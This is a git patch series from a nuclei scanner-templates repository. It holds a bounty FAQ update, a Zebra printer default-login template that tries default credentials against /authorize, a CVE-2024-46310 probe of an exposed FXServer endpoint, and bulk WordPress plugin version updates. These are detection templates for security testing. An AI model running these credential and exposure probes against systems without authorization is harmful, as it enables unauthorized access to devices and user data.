+> **Note**: Triagers will make the final decision on whether a template qualifies for a reward based on validation and the acceptance criteria outlined. + +## How do I start working on a bounty issue? +1. **Find an Issue**: Look for issues tagged with 💎 **Bounty**. +2. **Declare Work**: Comment with `/attempt #` to claim the issue. +3. **Submit Work**: Submit your pull request with `/claim #` in the PR description when ready. + +## Can I collaborate with others? +Yes, you can collaborate with other contributors and split rewards by commenting: +``` +/claim # +/split @contributor1 +/split @contributor2 +``` + +## Is there a limit to how many issues I can work on? +You can work on up to **3 issues** simultaneously. + +## What happens if I don’t complete an issue on time? +Issues must be completed within **2 months**, or they will be closed. + +## How are rewards distributed? +Rewards are distributed once the template is fully validated. If the issue remains unresolved for **few weeks**, the bounty may increase. + +## What should I include in my template submission? +Include the following: +- **Complete POC**: A working Proof of Concept. +- **Matchers**: Multiple matchers to prevent false positives. +- **Debug Data**: Data to assist the triage team in validation. +- **Metadata**: Include required fields like `id`, `name`, `author`, `severity`, `description`, and `reference`. + +## What types of templates will be rejected? +Templates may be rejected if they: +- Rely solely on version detection. +- Lack a complete POC. +- Contain weak matchers or redundant changes to existing templates. + +## What should I avoid when submitting a template? +- Avoid sharing real-world targets publicly. +- Don’t submit templates with weak matchers. +- Avoid unnecessary changes to existing templates. + +## Is there a leaderboard for contributors? +Yes! We now have a **leaderboard** that showcases top contributors. You can check it out here: [Leaderboard](https://cloud.projectdiscovery.io/templates/leaderboard). + +## Is this program permanent? +The rewards program is currently a test run, but we may make changes based on community feedback. + +## What additional rewards are available besides bounties? +Beyond bounties, we also reward contributors with: +- **Swag** such as t-shirts and stickers. +- **Invites to security conferences** for standout contributors. +- **Stickers** as a token of appreciation for all first-time contributors, regardless of the bounty. + +> Contributors who feel their pull request or issue was overlooked for first-time contributor stickers can ping us on our Discord for assistance: [ProjectDiscovery Discord](https://discord.com/invite/projectdiscovery). From 0029605407ff9e7226f20bedae55db897a2d2421 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Oct 2024 17:27:02 +0700 Subject: [PATCH 177/218] Update Community-Rewards-FAQ.md --- Community-Rewards-FAQ.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Community-Rewards-FAQ.md b/Community-Rewards-FAQ.md index 148a743b0b..3242d24a33 100644 --- a/Community-Rewards-FAQ.md +++ b/Community-Rewards-FAQ.md @@ -22,6 +22,9 @@ Templates must meet the following criteria: 2. **Declare Work**: Comment with `/attempt #` to claim the issue. 3. **Submit Work**: Submit your pull request with `/claim #` in the PR description when ready. +## How often are new bounty issues added? +We add new bounty issues on a **weekly basis**, so make sure to check back regularly for fresh opportunities. In the future, you can expect many more bounty issues as the program expands, allowing more opportunities for contributors to participate and earn rewards. + ## Can I collaborate with others? Yes, you can collaborate with other contributors and split rewards by commenting: ``` From 54084d70dfef037ba93569050a7913776b43207b Mon Sep 17 00:00:00 2001 From: y0no Date: Wed, 16 Oct 2024 16:08:37 +0200 Subject: [PATCH 178/218] Add Zebra default logins template --- .../zebra/zebra-printer-default-login.yaml | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/default-logins/zebra/zebra-printer-default-login.yaml diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml new file mode 100644 index 0000000000..22cf17d3fa --- /dev/null +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -0,0 +1,44 @@ +id: zebra-default-login + +info: + name: Zebra - Default Login + author: y0no + severity: medium + metadata: + verified: true + max-request: 1 + tags: zebra,default-login,misconfig,printer + + +http: + - raw: + - | + POST /authorize HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + 0={{username}}&1={{password}} + + attack: pitchfork + payloads: + username: + - 1234 + - admin + password: + - '' + - 1234 + + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Access Granted." + + - type: status + status: + - 200 From 994f5447075f693723bdcd39940cdabd7645c3c5 Mon Sep 17 00:00:00 2001 From: y0no Date: Wed, 16 Oct 2024 16:14:00 +0200 Subject: [PATCH 179/218] Fix indentation --- .../zebra/zebra-printer-default-login.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index 22cf17d3fa..6a47b55f4a 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -12,13 +12,13 @@ info: http: - raw: - - | - POST /authorize HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} + - | + POST /authorize HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} - 0={{username}}&1={{password}} + 0={{username}}&1={{password}} attack: pitchfork payloads: From df4404792c405e0b13d7f68af2ea3c8fbba4ed37 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 16 Oct 2024 19:38:01 +0300 Subject: [PATCH 180/218] add CVE-2024-46310 --- http/cves/2024/CVE-2024-46310.yaml | 31 ++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/cves/2024/CVE-2024-46310.yaml diff --git a/http/cves/2024/CVE-2024-46310.yaml b/http/cves/2024/CVE-2024-46310.yaml new file mode 100644 index 0000000000..45cd75d041 --- /dev/null +++ b/http/cves/2024/CVE-2024-46310.yaml @@ -0,0 +1,31 @@ +id: CVE-2024-46310 + +info: + name: FXServer < v9601 - Information Exposure + author: s4e-io + severity: medium + description: | + Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint. + reference: + - https://github.com/UwUtisum/CVE-2024-46310 + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-46310 + - https://vulners.com/githubexploit/D31ED8EC-1E21-54F9-AD42-778DAFBC8B4E + metadata: + verified: true + max-request: 1 + vendor: fxserver + product: fxserver + tags: cve,cve2024,fxserver,info-leak + +http: + - raw: + - | + GET /players.json HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"endpoint", "id", "identifiers", "name", "ping")' + - 'status_code == 200' + condition: and From 1422c1112150f8ae04885a4c8867eee90cf34041 Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 17 Oct 2024 00:22:15 +0000 Subject: [PATCH 181/218] =?UTF-8?q?chore:=20update=20WordPress=20Plugins?= =?UTF-8?q?=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-google-maps.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - http/technologies/wordpress/plugins/extendify.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-logging.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 8 insertions(+), 207 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 5f7049803b..b58299c38c 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.4.5 \ No newline at end of file +4.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index 132d9f7707..df4bdc7e53 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.2.8 \ No newline at end of file +3.2.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 712bd5a680..5436ea06e3 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.3.1 \ No newline at end of file +3.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index a6254504e4..9183195ace 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.3.1 \ No newline at end of file +2.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 261da462f8..3256e59f25 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.57 \ No newline at end of file +4.10.58 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index d3038a44d1..4858289237 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.229 \ No newline at end of file +1.0.230 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 9f4a0fbc18..905c243928 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -8.3.0 \ No newline at end of file +8.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index 217ebbc56c..cce4d6008e 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.42 \ No newline at end of file +9.0.43 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index a6985ccfbc..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5810803f5a74bf8af85b82942a1ae18676897f936dbe1ae30ecb20a9918be1a02206293fe49a3b18ceac3719eb0c17e937ec0e5f6641519b6002a78696d9fb74c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index cfd4aa8cc3..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202918a5094ce084c4d424c9feddd08ff242eef51dc198c173a3ffa821b07816c902207cbbc117a6291547218936981fd93d88401b18fc654816500514baab7883573d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 5ceaa4046e..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082bb23b99ed25bc2cdd1341b56cf445904fe258e7001c1417948a748ba1cf8110221009671b988c6d6bfe0617801d6d2cc80e9b590e9e1382b8b42a36ab0239b564d4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 556f6b7b45..1f02455962 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c33ff199435a35884a1fdb84135cd37392643ab2fd68c2427c32f9253d55945502200ff8683e530b0545188bcf264b8067b961dc97ad1bc0b2e43486b232fb965289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 7faf7483b0..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022043e5ae7906e122bde13118dde8343ca5a1ea491af521a17d84fbca232dcde9ad02200a48695afda4885225605c44d8b0b811de4e5f69141577bbb42d1d5b2748f764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index c114554487..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b11809c7fc6e6d64d9530c8dfa32174ca529ba33ba78488b3949d1be659233f70221009f5d963d6fd1a4582bd7d542eb984433efe51c4f2dee5c3f683ab414ab925094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 141d854cdd..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2d5a569366f15f9ac1bbc2d94a4a4262a4ebf237aba881242ddc3975a87d400022100eb8b9a43aa4497a1d1abd5160c5073b2370f2e9edc953e989b0f3d376673887a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index dc88c849a4..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d74af694f762fe0d1b71c344a05316e7703144d3711e983c75e1ae488cf64302022003d1eece3c0a78ba99d625f02c9e84f480242647d626c18411881241a3591507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 6d3838b398..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040b4c7e288ecc5098edaec29935c890a7ba6b7b044b44b4e545b7553002f0025022100f1b44a1c6be334175f67a38abd8294bab5f75b918f99f0d26736f71d00142213:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e09d4c96d6..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043021f487e280fc5c88c91d12ec2c8046549191eef0eeba616b7632069093bbe1b8b0220526cfc36a0c5a5cd49f40560bec208942c1ab0db5a254368680c0123ca598afc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 8eb2fe79be..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e57c217abc18fea1f3f6e9cdb9485f9f4a27cdfe15c07755c0b4a2413d84377022100f0e7a1d4977145f2e8642d7ac8a932cc219c40e5a64a6a7f3ce3fd047b9bf742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 305f9077af..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039d3f7e22644c25f1daaeba4857ceb1ad822e48219b7ec954bbe951891e3ecbf022100f0b03bdad4dff3e29e07e9abea5a143eab122b4b427bd55fdce804d456fa8bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml 